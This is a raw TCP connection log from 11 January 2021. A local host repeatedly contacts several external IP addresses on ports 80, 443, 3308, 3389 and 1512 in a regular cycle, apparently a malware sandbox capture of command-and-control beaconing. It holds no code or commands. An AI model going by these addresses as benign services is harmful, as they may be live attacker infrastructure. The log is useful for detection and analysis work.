Jan 11, 2021 16:52:16.920187950 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:17.144717932 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:17.144891024 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:17.196650028 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:17.196760893 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:17.234844923 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:17.248574972 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:17.367079973 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:17.367130041 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:17.367433071 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:17.406845093 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:17.458750963 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:17.758886099 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.802160978 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:17.802278042 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.805775881 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.848987103 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:17.859937906 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:17.859973907 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:17.860071898 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.860316038 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.867273092 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.914422035 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:17.914540052 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.924678087 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.924748898 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:17.967959881 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:17.968170881 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:18.010956049 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:18.014269114 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:18.014280081 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:18.125368118 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:18.125411034 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:18.125581980 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:18.132582903 CET	49170	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:18.175750017 CET	3308	49170	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:18.653634071 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.710021973 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:18.711689949 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.713076115 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.767026901 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:18.808893919 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:18.808917999 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:18.808980942 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.809012890 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.820979118 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.875190973 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:18.883307934 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:18.883542061 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.894328117 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.894435883 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.948115110 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:18.948338985 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:18.987309933 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:19.002073050 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:19.002090931 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:19.092550039 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:19.092573881 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:19.092746973 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:19.098289013 CET	49171	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:19.153325081 CET	3389	49171	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:19.492494106 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.545416117 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.545510054 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.547018051 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.599769115 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.607486010 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.607502937 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.607659101 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.621030092 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.675478935 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.675698042 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.693444967 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.693808079 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.746670961 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.746896029 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.799866915 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.899674892 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.899712086 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:19.900022984 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.905565023 CET	49172	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:19.958478928 CET	1512	49172	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:20.024224043 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.076229095 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.076397896 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.077478886 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.129487038 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.144717932 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.144820929 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.160794020 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.215171099 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.215265036 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.226481915 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.226782084 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.278713942 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.278820038 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.330722094 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.449069023 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.449112892 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.449297905 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.455311060 CET	49173	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:20.507314920 CET	443	49173	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:20.570628881 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.613852024 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.614032030 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.615534067 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.658610106 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.675955057 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.675988913 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.676067114 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.692753077 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.739496946 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.739577055 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.748795033 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.749093056 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.792365074 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.792473078 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.832559109 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.835664034 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.835721016 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.947207928 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.947252989 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:20.947529078 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.953438997 CET	49174	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:20.996567965 CET	3308	49174	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:21.073873997 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.128585100 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.128787994 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.130359888 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.185148954 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.214869022 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.214915037 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.215043068 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.215101957 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.227627039 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.289609909 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.289885998 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.296646118 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.296760082 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.350992918 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.351178885 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.390450001 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.406202078 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.406234980 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.497071981 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.497103930 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.497320890 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.497371912 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.504093885 CET	49175	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:21.558464050 CET	3389	49175	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:21.619970083 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.673295975 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:21.673595905 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.674967051 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.727951050 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:21.735104084 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:21.735137939 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:21.735260963 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.752535105 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.806829929 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:21.807048082 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.820386887 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.820579052 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.873610973 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:21.873869896 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:21.913093090 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:21.928630114 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:22.026272058 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:22.026330948 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:22.026609898 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:22.032582045 CET	49176	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:22.085860014 CET	1512	49176	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:22.150350094 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.202234030 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.202454090 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.205374956 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.257528067 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.272886992 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.273000956 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.286983013 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.341360092 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.341578960 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.354204893 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.354326010 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.406050920 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.406354904 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.442892075 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.458179951 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.575248003 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.575273991 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.575508118 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.579891920 CET	49177	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:22.631644011 CET	443	49177	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:22.696537018 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.739895105 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:22.739985943 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.740691900 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.783739090 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:22.794836998 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:22.794876099 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:22.794950962 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.794972897 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.812174082 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.857024908 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:22.857109070 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.863939047 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.864160061 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.907356024 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:22.907454967 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:22.948139906 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:22.950567007 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:23.062721968 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:23.062755108 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:23.062942982 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:23.067403078 CET	49178	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:23.110549927 CET	3308	49178	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:23.183147907 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.237246990 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.237368107 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.238856077 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.292659044 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.323486090 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.323528051 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.323681116 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.337174892 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.397604942 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.397876024 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.410955906 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.411206961 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.465542078 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.465846062 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.505086899 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.519866943 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.519893885 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.607500076 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.607530117 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.607855082 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.613296032 CET	49179	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:23.667114973 CET	3389	49179	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:23.725672960 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.778644085 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:23.778784990 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.780577898 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.833313942 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:23.840454102 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:23.840483904 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:23.840612888 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.856163025 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.910183907 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:23.910459995 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.923547983 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.924019098 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:23.976754904 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:23.976999998 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:24.016443968 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:24.029793978 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:24.132281065 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:24.132338047 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:24.132571936 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:24.138494968 CET	49180	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:24.191158056 CET	1512	49180	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:24.256491899 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.308763027 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.308901072 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.310834885 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.362931967 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.377834082 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.377978086 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.396190882 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.450743914 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.450964928 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.457464933 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.457674026 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.509753942 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.510016918 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.546860933 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.562176943 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.679018021 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.679059029 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.679307938 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.685122013 CET	49181	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:24.737258911 CET	443	49181	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:24.802474976 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:24.845743895 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:24.845896959 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:24.847459078 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:24.890496969 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:24.901149035 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:24.901170969 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:24.901371956 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:24.915837049 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:24.961026907 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:24.961200953 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:24.972645998 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:24.972909927 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:25.016204119 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:25.016530991 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:25.057081938 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:25.059709072 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:25.059739113 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:25.171278000 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:25.171351910 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:25.171395063 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:25.171469927 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:25.173696041 CET	49182	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:25.219233990 CET	3308	49182	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:25.291169882 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.345767975 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.345944881 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.347157001 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.400960922 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.418198109 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.418241024 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.418312073 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.418348074 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.429913998 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.489644051 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.489837885 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.504026890 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.504323006 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.558167934 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.558357954 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.598259926 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.612660885 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.612696886 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.703183889 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.703227997 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.703388929 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.704977036 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.709203959 CET	49183	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:25.766844034 CET	3389	49183	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:25.832650900 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:25.885744095 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:25.885848045 CET	49184	1512	192.168.2.22	46.105.131.65
